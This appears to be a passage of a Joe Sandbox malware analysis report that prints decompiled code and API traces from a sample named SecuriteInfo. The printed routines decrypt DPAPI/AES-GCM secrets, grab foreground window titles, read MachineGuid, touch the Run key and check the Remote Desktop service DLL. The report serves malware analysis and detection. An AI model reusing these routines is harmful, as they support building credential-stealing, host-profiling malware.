                                                                    				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
                                                                    				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
                                                                    				FreeLibrary(_t36);
                                                                    				return 1;
                                                                    			}
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F6AA
                                                                    • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F6BE
                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F6CA
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,02D1DCAA), ref: 02D1F70F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoadResource$FindFree
                                                                    • String ID:
                                                                    • API String ID: 3272429154-0
                                                                    • Opcode ID: b7ed6fa33afb4b19fc76bc887c599d9290175f3f0fd15641da219473a421eef1
                                                                    • Instruction ID: b90911f1d1c36331c08e1e781a3d59d9e33a09787912a309812adca2a973015a
                                                                    • Opcode Fuzzy Hash: b7ed6fa33afb4b19fc76bc887c599d9290175f3f0fd15641da219473a421eef1
                                                                    • Instruction Fuzzy Hash: 5101D6B5744A11AFD3144F25EC85B66B7B4FF583147058638E829C3790D770DC15C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 65%
                                                                    			E02D1C9F2(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
                                                                    				char _v8;
                                                                    				void* _v12;
                                                                    				char _v16;
                                                                    				void* _t16;
                                                                    				void* _t19;
                                                                    				void* _t34;
                                                                    				void* _t35;
                                                                    
                                                                    				_t35 = 0;
                                                                    				_t16 = E02D1CC54(__ecx,  &_v12,  &_v8);
                                                                    				_pop(_t26);
                                                                    				if(_t16 == 0) {
                                                                    					L8:
                                                                    					return _t35;
                                                                    				}
                                                                    				_t34 = _v12;
                                                                    				if(_v8 >= 5) {
                                                                    					_t19 = E02D11000(_t34, "DPAPI", 5);
                                                                    					_t42 = _t19;
                                                                    					if(_t19 == 0) {
                                                                    						_push( &_v16);
                                                                    						_push( &_v12);
                                                                    						if(E02D1CA78(_t34 + 5, _v8 - 5, _t42) != 0) {
                                                                    							if(_v16 == 0x20) {
                                                                    								_t35 = E02D1CCB4(_t22, _v12, _a8, _a12);
                                                                    							}
                                                                    							LocalFree(_v12);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				LocalFree(_t34);
                                                                    				goto L8;
                                                                    			}
                                                                    APIs
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC73
                                                                      • Part of subcall function 02D1CC54: LocalAlloc.KERNEL32(00000040,?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CC81
                                                                      • Part of subcall function 02D1CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC97
                                                                      • Part of subcall function 02D1CC54: LocalFree.KERNEL32(?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CCA5
                                                                    • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 02D1CA6C
                                                                      • Part of subcall function 02D1CA78: GetLastError.KERNEL32 ref: 02D1CADE
                                                                    • LocalFree.KERNEL32(?), ref: 02D1CA65
                                                                      • Part of subcall function 02D1CCB4: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,02D1CA5F,?), ref: 02D1CCD1
                                                                      • Part of subcall function 02D1CCB4: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCEA
                                                                      • Part of subcall function 02D1CCB4: BCryptGenerateSymmetricKey.BCRYPT(00000020,02D1CA5F,00000000,00000000,?,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                                                    • String ID: $DPAPI
                                                                    • API String ID: 379455710-1819349886
                                                                    • Opcode ID: 9a55507770247adcbe3e15b9953d5a9f77d2deb2057aa56ab3a0224b5e02c06b
                                                                    • Instruction ID: 450b53acbf01823e013e455dfa1cf9d1fa66b56fefa403c0fb8b66035deb8222
                                                                    • Opcode Fuzzy Hash: 9a55507770247adcbe3e15b9953d5a9f77d2deb2057aa56ab3a0224b5e02c06b
                                                                    • Instruction Fuzzy Hash: B601C472A40219BBCF11EBA0E945DDEB779EB44708F014166E800E2680E730EF45DBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E02D147EA(intOrPtr _a4) {
                                                                    				char _v8;
                                                                    				struct tagLASTINPUTINFO _v16;
                                                                    				signed int _v36;
                                                                    				char _v40;
                                                                    				short _v552;
                                                                    
                                                                    				_v16.cbSize = 8;
                                                                    				GetLastInputInfo( &_v16);
                                                                    				_t23 = GetTickCount() - _v16.dwTime;
                                                                    				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
                                                                    				E02D135E5( &_v8,  &_v552);
                                                                    				_t12 =  &_v36;
                                                                    				_v36 = _v36 & 0x00000000;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v40 = 0x15;
                                                                    				asm("movups [ebp-0x1c], xmm0");
                                                                    				E02D13679(E02D13761(E02D13740( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
                                                                    				E02D13665( &_v40);
                                                                    				E02D15EA5(_v8);
                                                                    				return _a4;
                                                                    			}
                                                                    APIs
                                                                    • GetLastInputInfo.USER32 ref: 02D147FF
                                                                    • GetTickCount.KERNEL32 ref: 02D14805
                                                                    • GetForegroundWindow.USER32 ref: 02D14819
                                                                    • GetWindowTextW.USER32 ref: 02D1482C
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                                                    • String ID:
                                                                    • API String ID: 2567647128-0
                                                                    • Opcode ID: 945a84fb3f01d7f5be3abe39b0dd489ebfb8e5db397fa903e5e1301107e36f8d
                                                                    • Instruction ID: 0c0a35220c75836e42c7f79dec2b3e0a9f3ab41aaac333764812f02321e46430
                                                                    • Opcode Fuzzy Hash: 945a84fb3f01d7f5be3abe39b0dd489ebfb8e5db397fa903e5e1301107e36f8d
                                                                    • Instruction Fuzzy Hash: B6111EB1D40208EBDB14EBA4E959ADDB7B9EF58305F014595E802B6280EF74AF58CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1EA89(void* __ecx) {
                                                                    				void* _t14;
                                                                    				long _t15;
                                                                    				void** _t26;
                                                                    				void* _t27;
                                                                    
                                                                    				_t27 = __ecx;
                                                                    				_t1 = _t27 + 0x14; // 0x2d2956c
                                                                    				_t26 = _t1;
                                                                    				if( *_t26 == 0) {
                                                                    					L6:
                                                                    					_t5 = _t27 + 0x10; // 0x2d29568
                                                                    					E02D1EC8C(_t5);
                                                                    					_t6 = _t27 + 4; // 0x2d2955c
                                                                    					E02D1EC8C(_t6);
                                                                    					_t7 = _t27 + 0xc; // 0x2d29564
                                                                    					E02D1EC8C(_t7);
                                                                    					_t8 = _t27 + 8; // 0x2d29560
                                                                    					_t14 = E02D1EC8C(_t8);
                                                                    					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
                                                                    					return _t14;
                                                                    				}
                                                                    				_t15 = GetCurrentThreadId();
                                                                    				_t2 = _t27 + 0x18; // 0x0
                                                                    				if(_t15 ==  *_t2) {
                                                                    					L5:
                                                                    					E02D1EC8C(_t26);
                                                                    					goto L6;
                                                                    				}
                                                                    				if( *(_t27 + 0x10) == 0) {
                                                                    					return _t15;
                                                                    				}
                                                                    				_t4 = _t27 + 0x10; // 0x0
                                                                    				SetEvent( *_t4);
                                                                    				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
                                                                    					TerminateThread( *_t26, 0xfffffffe);
                                                                    				}
                                                                    				goto L5;
                                                                    			}







                                                                    • Statement addresses (listing order): 0x02d1ea8a, 0x02d1ea8d, 0x02d1ea8d, 0x02d1ea93, 0x02d1ead4, 0x02d1ead4, 0x02d1ead7, 0x02d1eadc, 0x02d1eadf, 0x02d1eae4, 0x02d1eae7, 0x02d1eaec, 0x02d1eaef, 0x02d1eaf4, 0x00000000, 0x02d1eaf4, 0x02d1ea95, 0x02d1ea9b, 0x02d1ea9e, 0x02d1eacd, 0x02d1eacf, 0x00000000, 0x02d1eacf, 0x02d1eaa4, 0x02d1eafa, 0x02d1eafa, 0x02d1eaa6, 0x02d1eaa9, 0x02d1eac1, 0x02d1eac7, 0x02d1eac7, 0x00000000

                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 02D1EA95
                                                                    • SetEvent.KERNEL32(00000000), ref: 02D1EAA9
                                                                    • WaitForSingleObject.KERNEL32(02D2956C,00001388), ref: 02D1EAB6
                                                                    • TerminateThread.KERNEL32(02D2956C,000000FE), ref: 02D1EAC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                                                    • String ID:
                                                                    • API String ID: 2174867186-0
                                                                    • Opcode ID: 9fac2392becdd390e8250dd1342d572c5b72898574dab56d07a0a8afe12e15fe
                                                                    • Instruction ID: 1010c69391f398a0538f505cfca412e0a68825eeb0f8e3a106a93b1fb907612a
                                                                    • Opcode Fuzzy Hash: 9fac2392becdd390e8250dd1342d572c5b72898574dab56d07a0a8afe12e15fe
                                                                    • Instruction Fuzzy Hash: 36011D31504611EBD739AF10F948E99B7B3FF60311F610A29E85252EE0CBB06D98CE91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000), ref: 0041671D
                                                                    • GetLastError.KERNEL32(?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000,00000000,00000000,?,00414BC5,00420128), ref: 00416729
                                                                      • Part of subcall function 004166EF: CloseHandle.KERNEL32(FFFFFFFE,00416739,?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000,00000000,00000000), ref: 004166FF
                                                                    • ___initconout.LIBCMT ref: 00416739
                                                                      • Part of subcall function 004166B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004166E0,004152B0,00000000,?,00414646,00000000,0070F938,00000000,00000000), ref: 004166C4
                                                                    • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,004152CA,00000000,00000001,00000000,00000000,?,00414646,00000000,0070F938,00000000,00000000), ref: 0041674E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 9b6803eefc5e9ebc6329461ebe9925345cbbf35a2184f21edf294b02da52e2af
                                                                    • Instruction ID: c7c3f7091c1e534a5099180d324dd9890964367d7e39adf498d0ec122441db0a
                                                                    • Opcode Fuzzy Hash: 9b6803eefc5e9ebc6329461ebe9925345cbbf35a2184f21edf294b02da52e2af
                                                                    • Instruction Fuzzy Hash: 74F0303A500128BBCF631F95EC049CE3F66FB193A5B014066FA1885130CB32C960EB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 0040CEED
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0040CF00
                                                                    • _free.LIBCMT ref: 0040CF11
                                                                    • _free.LIBCMT ref: 0040CF22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8911d68373d0e4db2147d2cc41de244ca42f5d2b7dca5af37a12fb31cfb51faf
                                                                    • Instruction ID: fe4210076c81264698a3c7d0e01ded1f02e408323a3dd840fbf7e292bbb6927c
                                                                    • Opcode Fuzzy Hash: 8911d68373d0e4db2147d2cc41de244ca42f5d2b7dca5af37a12fb31cfb51faf
                                                                    • Instruction Fuzzy Hash: 7DE0BF7E8021249BC692AF5BBC054D93E21FBE670C302915BF51026672D735551DBF8D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlDecodePointer.NTDLL(?), ref: 004161B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: o[A$}@
                                                                    • API String ID: 3527080286-4144133561
                                                                    • Opcode ID: e2a7858704f390135af1b0f513bc6bea2174125595e019b4c5b8425964d3883e
                                                                    • Instruction ID: c75f8cc67d4ff90171038b61d461681b8a45a2314b3b25f14b3ca80538b6e811
                                                                    • Opcode Fuzzy Hash: e2a7858704f390135af1b0f513bc6bea2174125595e019b4c5b8425964d3883e
                                                                    • Instruction Fuzzy Hash: 8551BEB090050DCBCF14EF98EA485EDBBB0FB09304F16419BD861A7254CB79D9A5DB2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00409B8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 6e5149fda686c77822f5a5338aced222f84b3c1b33c0b0a996e631c3f21fafb9
                                                                    • Instruction ID: 45359b741b2cc263e06d916c17eb6927f9f232f11a2b683f45bc68c1f1c14c42
                                                                    • Opcode Fuzzy Hash: 6e5149fda686c77822f5a5338aced222f84b3c1b33c0b0a996e631c3f21fafb9
                                                                    • Instruction Fuzzy Hash: 31414A71900209AFDF16DF98CD81AEE7BB5BF48304F19406AF904772A2D339AD50DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 32%
                                                                    			E02D1FCB8(intOrPtr* __ecx, void* __edx) {
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				int _v20;
                                                                    				char _v24;
                                                                    				int* _t18;
                                                                    				void* _t48;
                                                                    				int* _t50;
                                                                    
                                                                    				_t48 = __edx;
                                                                    				_t35 = __ecx;
                                                                    				_t50 = __ecx;
                                                                    				_v8 = 0;
                                                                    				_v24 = 0;
                                                                    				_v20 = 0;
                                                                    				 *((intOrPtr*)(__ecx)) = 0;
                                                                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                    				if( *0x2e5e094 != 0) {
                                                                    					_t18 = 0x2e5e090;
                                                                    				} else {
                                                                    					RegOpenKeyExW(0x80000002,  *(E02D135E5( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
                                                                    					asm("sbb esi, esi");
                                                                    					E02D15EA5(_v12);
                                                                    					if(1 != 0) {
                                                                    						E02D20FC3(_t48, E02D135E5( &_v12, L"MachineGuid"),  &_v24);
                                                                    						E02D15EA5(_v12);
                                                                    						E02D20FAE( &_v8);
                                                                    					}
                                                                    					E02D12E93(_t50, E02D1607A( &_v16,  &_v24));
                                                                    					E02D13036( &_v16);
                                                                    					_t35 = 0x2e5e090;
                                                                    					_t18 = _t50;
                                                                    				}
                                                                    				E02D12E93(_t35, _t18);
                                                                    				E02D13036( &_v24);
                                                                    				E02D20FAE( &_v8);
                                                                    				return _t50;
                                                                    			}











                                                                    • Statement addresses (listing order): 0x02d1fcb8, 0x02d1fcb8, 0x02d1fcc2, 0x02d1fcc4, 0x02d1fcc7, 0x02d1fcca, 0x02d1fccd, 0x02d1fccf, 0x02d1fcd8, 0x02d1fd61, 0x02d1fcde, 0x02d1fcfc, 0x02d1fd07, 0x02d1fd09, 0x02d1fd11, 0x02d1fd28, 0x02d1fd30, 0x02d1fd38, 0x02d1fd38, 0x02d1fd4b, 0x02d1fd53, 0x02d1fd58, 0x02d1fd5d, 0x02d1fd5d, 0x02d1fd67, 0x02d1fd6f, 0x02d1fd77, 0x02d1fd81

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 02D1FCFC
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,00000000,02D235AB,?,?,?,02D215B2,?,?,80000001), ref: 02D20FE6
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,02D215B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D2100A
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                    • API String ID: 1903904756-1211650757
                                                                    • Opcode ID: b9057597e5c87389e0a5f8bde0882280cf812471d42075004e06babaadded640
                                                                    • Instruction ID: cf630f7f4c5c543f6b87e32f96c40b6a583097262f86e0ac0683dbf0c2d72252
                                                                    • Opcode Fuzzy Hash: b9057597e5c87389e0a5f8bde0882280cf812471d42075004e06babaadded640
                                                                    • Instruction Fuzzy Hash: 29115170D40129BBDB14EFA4ED918EEB77AEF64701F50056AA402A3790EB705F09CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1DE1F(void* __edx) {
                                                                    				/* Decompiler output, annotated: reads the ServiceDll value of the
                                                                    				   TermService (Remote Desktop) service from HKLM and compares it
                                                                    				   with an expected string. Helper roles below are taken from the
                                                                    				   "APIs" list of this report (subcall functions). */
                                                                    				void* _v8;      /* HKEY returned by RegOpenKeyExW */
                                                                    				void* _v12;     /* heap string "ServiceDll", later the value read */
                                                                    				short* _v16;    /* heap copy of the subkey path (wide string) */
                                                                    				int _v20;
                                                                    				char _v24;      /* output descriptor filled by E02D20FC3 */
                                                                    				void* _t28;
                                                                    				void* _t46;
                                                                    				int _t48;       /* return value: comparison result, 0 on failure */
                                                                    
                                                                    				_t46 = __edx;
                                                                    				_v8 = 0;
                                                                    				/* E02D135E5 wraps lstrlenW/lstrcpyW: allocate and copy the subkey path */
                                                                    				E02D135E5( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                                                    				_v24 = 0;
                                                                    				_v20 = 0;
                                                                    				/* 0x80000002 = HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY */
                                                                    				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
                                                                    					L3:
                                                                    					_t48 = 0;
                                                                    				} else {
                                                                    					/* E02D20FC3 wraps RegQueryValueExW: read the "ServiceDll" value */
                                                                    					_t28 = E02D20FC3(_t46, E02D135E5( &_v12, L"ServiceDll"),  &_v24);
                                                                    					E02D15EA5(_v12);   /* E02D15EA5 wraps VirtualFree */
                                                                    					if(_t28 != 0) {
                                                                    						/* Compare the value read with the string at 0x2e5e054 (its contents
                                                                    						   are not in this dump); E02D13248 is inferred to be a string compare. */
                                                                    						_t48 = E02D13248(E02D12ECF( &_v24,  &_v12), 0x2e5e054);
                                                                    						E02D15EA5(_v12);
                                                                    						_v12 = 0;
                                                                    					} else {
                                                                    						E02D20FAE( &_v8);   /* E02D20FAE wraps RegCloseKey */
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				E02D13036( &_v24);
                                                                    				E02D15EA5(_v16);
                                                                    				E02D20FAE( &_v8);
                                                                    				return _t48;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
